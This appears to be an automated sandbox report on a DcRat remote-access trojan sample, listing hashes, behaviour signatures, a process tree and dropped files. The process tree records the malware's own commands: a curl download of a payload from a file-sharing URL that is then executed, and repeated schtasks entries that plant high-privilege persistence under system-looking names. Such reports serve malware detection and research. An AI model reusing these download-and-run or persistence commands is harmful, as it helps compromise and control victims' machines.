Analysis

  • max time kernel
    146s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    05-12-2024 18:23

General

  • Target
    usermode.exe
  • Size
    671KB
  • MD5
    0f1700ee21d3f50876ba87ba59b5362c
  • SHA1
    0204c433d0529811f23b71582da12e4276b3439f
  • SHA256
    92c13c55b6e2afc22881d1bd9cbea837d7f2dbc3e1c17c194608f2f86d0cc597
  • SHA512
    6ac8306aebf8161019df51b26078f3c993aeda3ecb9d4510e67fe788555d91a8453943136568bc643643b9fdea2983771fe35eecff47cafcc577aec789ef1f89
  • SSDEEP
    12288:RZco5avwoS8/jtVoMpaSU5WflFr5//EmnBPG2pptCA:WFS8/eS4WflFr5//EmnVrbt

Malware Config

Signatures

  • DcRat
    DarkCrystal (DC) is a .NET RAT, active since June 2019, that can load additional plugins.
  • Dcrat family
  • Process spawned unexpected child process (18 IoCs)
    This typically indicates the parent process was compromised via an exploit or macro.
  • Downloads MZ/PE file
  • Checks computer location settings (2 TTPs, 3 IoCs)
    Looks up the country code configured in the registry, likely for geofencing.
  • Executes dropped EXE (3 IoCs)
  • Indicator Removal: File Deletion (1 TTP)
    Adversaries may delete files left behind by their intrusion activity.
  • Drops file in Windows directory (4 IoCs)
  • Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s).
  • System Location Discovery: System Language Discovery (1 TTP, 3 IoCs)
    Attempts to gather information about the system language of a victim host in order to infer its geographical location.
  • System Network Configuration Discovery: Internet Connection Discovery (1 TTP, 1 IoC)
    Adversaries may check for Internet connectivity on compromised systems.
  • Modifies registry class (2 IoCs)
  • Runs ping.exe (1 TTP, 1 IoC)
  • Scheduled Task/Job: Scheduled Task (1 TTP, 18 IoCs)
    Schtasks is often used by malware for persistence or to perform post-infection execution.
  • Suspicious behavior: EnumeratesProcesses (64 IoCs)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of WriteProcessMemory (33 IoCs)
  • Uses Task Scheduler COM API (1 TTP)
    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\usermode.exe
    "C:\Users\Admin\AppData\Local\Temp\usermode.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4604
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/Z01XJyuAz2yPo4d4/client.bin --output C:\Windows\Speech\client.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4712
      • C:\Windows\system32\curl.exe
        curl --silent https://file.garden/Z01XJyuAz2yPo4d4/client.bin --output C:\Windows\Speech\client.exe
        3⤵
        • Drops file in Windows directory
        PID:4340
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      2⤵
      PID:920
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      2⤵
      PID:1476
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      2⤵
      PID:3464
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Windows\Speech\client.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1144
      • C:\Windows\Speech\client.exe
        C:\Windows\Speech\client.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:744
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\ComponentCrt\sBEZl9whlNx1coUjXXPbcOghFKEeD7haTOPQzUr4aUDA.vbe"
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:812
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\ComponentCrt\1lvoZv4qBcC2Me4L.bat" "
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4192
            • C:\ComponentCrt\chainreviewwinrefSvc.exe
              "C:\ComponentCrt/chainreviewwinrefSvc.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in Windows directory
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4404
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\oz9uVg0Ilv.bat"
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:448
                • C:\Windows\system32\chcp.com
                  chcp 65001
                  8⤵
                  PID:4564
                • C:\Windows\system32\PING.EXE
                  ping -n 10 localhost
                  8⤵
                  • System Network Configuration Discovery: Internet Connection Discovery
                  • Runs ping.exe
                  PID:964
                • C:\ComponentCrt\smss.exe
                  "C:\ComponentCrt\smss.exe"
                  8⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3204
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del C:\Windows\Speech\client.exe
      2⤵
      PID:4968
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\ComponentCrt\smss.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2888
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\ComponentCrt\smss.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2320
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\ComponentCrt\smss.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:3724
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\ComponentCrt\WmiPrvSE.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:1184
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\ComponentCrt\WmiPrvSE.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:1636
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\ComponentCrt\WmiPrvSE.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:912
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\WmiPrvSE.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2248
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\WmiPrvSE.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:5032
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\WmiPrvSE.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2540
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\ComponentCrt\conhost.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2836
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\ComponentCrt\conhost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:4696
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\ComponentCrt\conhost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:4288
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:4996
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:4152
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:3940
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "chainreviewwinrefSvcc" /sc MINUTE /mo 12 /tr "'C:\ComponentCrt\chainreviewwinrefSvc.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2436
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "chainreviewwinrefSvc" /sc ONLOGON /tr "'C:\ComponentCrt\chainreviewwinrefSvc.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:5092
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "chainreviewwinrefSvcc" /sc MINUTE /mo 10 /tr "'C:\ComponentCrt\chainreviewwinrefSvc.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:3680

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\ComponentCrt\1lvoZv4qBcC2Me4L.bat
    Filesize: 98B
    MD5: 4dafd9e9509ac96be6aa5baec659da4d
    SHA1: a091552663ddea89536560f232b8339f318c9cbc
    SHA256: 0c53b640295abd25e8387957941e29f5c4e765376365409164ac39e3365a6ccf
    SHA512: d290c162347e236e0e197c52afc4f4b33f1eba2498dfe2ad86c414c87ab70c9fbbd2132cd08bfb4137e8555a095ca9acb6675727a4a5f65ccc46141c16698132
  • C:\ComponentCrt\chainreviewwinrefSvc.exe
    Filesize: 1.8MB
    MD5: 11cca9e2c6dc9c2a728b89e7314ec26a
    SHA1: 58aec3b662a1c4e8b43cc454d90813ac89b5e612
    SHA256: 300072795259e7b2baa69a7a3d19ffea1844dffc391e710c654aa1b66b0e2197
    SHA512: fb1fcff1c94e73b1227f65b237639e25604d614cfe365f2108bbbfdb489b97410fdc17411b8f00fc5b8f57d51080b4496010537a6a4ff9b15b7bdd24f89d0df7
  • C:\ComponentCrt\sBEZl9whlNx1coUjXXPbcOghFKEeD7haTOPQzUr4aUDA.vbe
    Filesize: 207B
    MD5: b292d233456b16f26abc1aa07c9f5de0
    SHA1: 7b025705136101b5618d81d8ebf472335eebde43
    SHA256: e75d13d4b079fafbd413fa8182c270f1f0f41b1b19b3469db12de226fed67b2d
    SHA512: 1c9c3846ab0e392dc6833de2a9238c91b6042b5095521196a3ceae8830edf7fb6d73118ed023b2e2daf287a48084fa8ee40241248a231cf668d5cc5e8f947ee4
  • C:\Users\Admin\AppData\Local\Temp\oz9uVg0Ilv.bat
    Filesize: 152B
    MD5: d0dd581981dd5efdad4ce5733b79b3dd
    SHA1: ca3cccda01d3891991232e855af3fd7e7723a641
    SHA256: a6bc1f45f45a4d6a553c5bfb064b2ab895ae73bb944ecbe3b7cfbbcb6650cc05
    SHA512: cad0f05ff708e64b2648e7c332b27d4a158cb3c1d4264ec6f43553265928769da480d1c37d58009c29f3e4a8770fccbae08da776fe30d7baf67e06637159bf15
  • C:\Windows\Speech\client.exe
    Filesize: 2.1MB
    MD5: bf4f13d82d217ed69d80124c50d9441c
    SHA1: b7ee7d109f61371342e924e6a0c3505347dd318f
    SHA256: 51890bfc6f223014ff16f4bfa6ace8e2d2ec3c81eb6965406813b9ca32b08508
    SHA512: 1ba17e55d6d1f6fda99daffe3f11f995d5e8434901b2aea9105728ccbff1b81727d96bf8811a62e8367fca0ec23bdea331165b001088b183281164269668d2f4
  • memory/3204-50-0x000000001CB50000-0x000000001CC52000-memory.dmp
    Filesize: 1.0MB
  • memory/4404-16-0x00000000004C0000-0x000000000069A000-memory.dmp
    Filesize: 1.9MB
  • memory/4404-18-0x0000000002860000-0x000000000286E000-memory.dmp
    Filesize: 56KB
  • memory/4404-23-0x000000001B310000-0x000000001B328000-memory.dmp
    Filesize: 96KB
  • memory/4404-21-0x000000001B670000-0x000000001B6C0000-memory.dmp
    Filesize: 320KB
  • memory/4404-20-0x000000001B2F0000-0x000000001B30C000-memory.dmp
    Filesize: 112KB
  • memory/4404-25-0x0000000002870000-0x000000000287C000-memory.dmp
    Filesize: 48KB